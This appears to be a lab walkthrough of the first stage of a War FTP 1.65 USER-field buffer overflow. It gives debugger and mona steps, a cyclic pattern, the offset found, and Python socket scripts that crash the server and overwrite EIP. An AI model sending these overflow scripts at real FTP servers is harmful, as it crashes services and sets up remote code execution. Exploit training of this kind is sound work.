War FTP 1.65 Buffer Overflow Part 1

Source: Cybrary: Advanced Penetration Testing

  • Give the program too much input in the username (USER) field
  • The saved return pointer is then overwritten with attacker-controlled input

Immunity Debugger

  • Go to File -> Attach -> war-ftpd

Setup Logging:

  • !mona config -set workingfolder C:\logs\%p

Identifying the Overwrite

  • !mona pattern_create 1100

===============================================================
  Output generated by mona.py v2.0, rev 566 – Immunity Debugger
===============================================================
  OS : xp, release 5.1.2600
  Process being debugged : war-ftpd (pid 4332)
  Current mona arguments: pattern_create 1100
===============================================================
===============================================================

Pattern of 1100 bytes :
-------------------

ASCII:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk

Exploit:

#!/usr/bin/python
import socket

# buffer = "A" * 1100    # first crash test: 1100 bytes of 'A'
# the 1100-byte cyclic pattern from !mona pattern_create 1100
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.58", 21))
response = s.recv(1024)     # FTP banner
print(response)
s.send(b"USER " + buffer.encode() + b"\r\n")   # oversized username triggers the overflow
response = s.recv(1024)
print(response)
s.send(b"PASS PASSWORD\r\n")
s.close()

After the exploit hits War FTP -> !mona findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory.

It reports whether the pattern landed in a register (e.g. EIP) and, if so, the offset of that value from the beginning of the pattern.

  • EIP contains normal pattern : 0x32714131 (offset 485)
  • ESP (0x00affd48) points at offset 493 in normal pattern (length 607)
  • EDI (0x00affe48) points at offset 749 in normal pattern (length 351)
  • EBP (0x00affda0) points at offset 581 in normal pattern (length 519)
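Mona gets those offsets by searching the pattern for the little-endian bytes of each register value: EIP = 0x32714131 was loaded from the bytes "1Aq2", which sit at offset 485. The script below is an added example, not from the page or the Cybrary course; it regenerates the same cyclic pattern in Python 3, performs that lookup, and builds the A/B/C layout used in the "Verifying Offsets" step so the 4 "B" bytes can be checked to land on the return address. Function names are my own.

```python
import string
import struct


def pattern_create(length: int) -> str:
    """Rebuild the Metasploit/mona cyclic pattern: each 3-byte chunk is
    Upper + lower + digit, so 4-byte windows are unique across the full
    26 * 26 * 10 * 3 = 20280-byte sequence."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern: str, reg_value: int) -> int:
    """Offset of a 32-bit register value inside the pattern, or -1 if absent.
    x86 is little-endian, so EIP=0x32714131 came from the bytes b'1Aq2'."""
    needle = struct.pack("<I", reg_value)
    return pattern.encode("ascii").find(needle)


def verification_buffer(offset: int, total: int = 1100) -> str:
    """The A/B/C layout from the page: 'B' * 4 must land exactly on the
    saved return address, and the 'C' padding keeps the total at 1100."""
    return "A" * offset + "B" * 4 + "C" * (total - offset - 4)


if __name__ == "__main__":
    pat = pattern_create(1100)
    eip = 0x32714131                   # value mona reported in EIP after the crash
    off = pattern_offset(pat, eip)
    print(struct.pack("<I", eip), "found at offset", off)   # b'1Aq2' found at offset 485
    buf = verification_buffer(off)
    print(len(buf), buf[off:off + 4])  # 1100 BBBB
```

A register value that never occurs in the pattern (e.g. 0x41414141 from the plain "A" * 1100 test) returns -1, which is the signal to fall back to a different length or a pattern search elsewhere in memory.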

Verifying Offsets

#!/usr/bin/python
import socket

# 485 bytes reach the saved return address, 4 bytes overwrite it,
# 611 bytes of padding keep the total at 1100 (485 + 4 + 611)
buffer = "A" * 485 + "B" * 4 + "C" * 611

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.20.10", 21))
response = s.recv(1024)     # FTP banner
print(response)
s.send(b"USER " + buffer.encode() + b"\r\n")   # EIP should now read 0x42424242
response = s.recv(1024)
print(response)
s.send(b"PASS PASSWORD\r\n")
s.close()
